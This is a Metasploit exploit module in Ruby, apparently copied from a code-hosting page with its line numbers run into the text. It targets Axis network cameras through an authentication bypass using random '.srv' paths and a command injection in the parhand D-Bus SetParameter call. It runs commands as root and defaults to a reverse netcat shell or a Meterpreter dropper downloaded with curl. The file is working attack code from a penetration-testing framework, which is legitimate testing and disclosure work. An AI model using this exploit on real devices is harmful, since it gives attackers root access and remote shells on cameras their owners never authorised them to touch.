Path: blob/master/modules/exploits/linux/http/axis_srv_parhand_rce.rb
32490 views
##1# This module requires Metasploit: https://metasploit.com/download2# Current source: https://github.com/rapid7/metasploit-framework3##45class MetasploitModule < Msf::Exploit::Remote67Rank = ExcellentRanking89include Msf::Exploit::Remote::HttpClient10include Msf::Exploit::CmdStager1112def initialize(info = {})13super(14update_info(15info,16'Name' => 'Axis Network Camera .srv-to-parhand RCE',17'Description' => %q{18This module exploits an auth bypass in .srv functionality and a19command injection in parhand to execute code as the root user.20},21'Author' => [22'Or Peles', # Vulnerability discovery (VDOO)23'wvu', # Metasploit module24'sinn3r', # Metasploit module25'Brent Cook', # Metasploit module26'Jacob Robles', # Metasploit module27'Matthew Kienow', # Metasploit module28'Shelby Pace', # Metasploit module29'Chris Lee', # Metasploit module30'Cale Black' # Metasploit module31],32'References' => [33['CVE', '2018-10660'],34['CVE', '2018-10661'],35['CVE', '2018-10662'],36['URL', 'https://blog.vdoo.com/2018/06/18/vdoo-discovers-significant-vulnerabilities-in-axis-cameras/'],37['URL', 'https://www.axis.com/files/faq/Advisory_ACV-128401.pdf']38],39'DisclosureDate' => '2018-06-18',40'License' => MSF_LICENSE,41'Privileged' => true,42'Targets' => [43[44'Unix In-Memory',45{46'Platform' => 'unix',47'Arch' => ARCH_CMD,48'Type' => :unix_memory,49'Payload' => {50'BadChars' => ' ',51'Encoder' => 'cmd/ifs',52'Compat' => {53'PayloadType' => 'cmd',54'RequiredCmd' => 'netcat-e'55}56},57'DefaultOptions' => {58'PAYLOAD' => 'cmd/unix/reverse_netcat_gaping'59}60}61],62[63'Linux Dropper',64{65'Platform' => 'linux',66'Arch' => ARCH_ARMLE,67'Type' => :linux_dropper,68'DefaultOptions' => {69'PAYLOAD' => 'linux/armle/meterpreter_reverse_tcp'70}71}72]73],74'DefaultTarget' => 1,75'DefaultOptions' => { 'WfsDelay' => 10 },76'Notes' => {77'Reliability' => UNKNOWN_RELIABILITY,78'Stability' => UNKNOWN_STABILITY,79'SideEffects' => UNKNOWN_SIDE_EFFECTS80}81)82)83end8485def check86res = send_request_cgi(87'method' => 'GET',88'uri' => "/index.html/#{rand_srv}"89)9091if res && res.code == 20492return CheckCode::Appears93end9495CheckCode::Safe96end9798def exploit99case target['Type']100when :unix_memory101execute_command(payload.encoded)102when :linux_dropper103execute_cmdstager(flavor: :curl, nospace: true)104end105end106107def execute_command(cmd, _opts = {})108send_request_cgi(109'method' => 'POST',110'uri' => "/index.html/#{rand_srv}",111'vars_post' => {112'action' => 'dbus',113'args' => dbus_send(114method: :set_param,115param: "string:root.Time.DST.Enabled string:;(#{cmd})&"116)117}118)119120send_request_cgi(121'method' => 'POST',122'uri' => "/index.html/#{rand_srv}",123'vars_post' => {124'action' => 'dbus',125'args' => dbus_send(method: :synch_params)126}127)128end129130def dbus_send(method:, param: nil)131args = '--system --dest=com.axis.PolicyKitParhand ' \132'--type=method_call /com/axis/PolicyKitParhand '133134args <<135case method136when :set_param137"com.axis.PolicyKitParhand.SetParameter #{param}"138when :synch_params139'com.axis.PolicyKitParhand.SynchParameters'140end141142args143end144145def rand_srv146"#{Rex::Text.rand_text_alphanumeric(8..42)}.srv"147end148149end150151152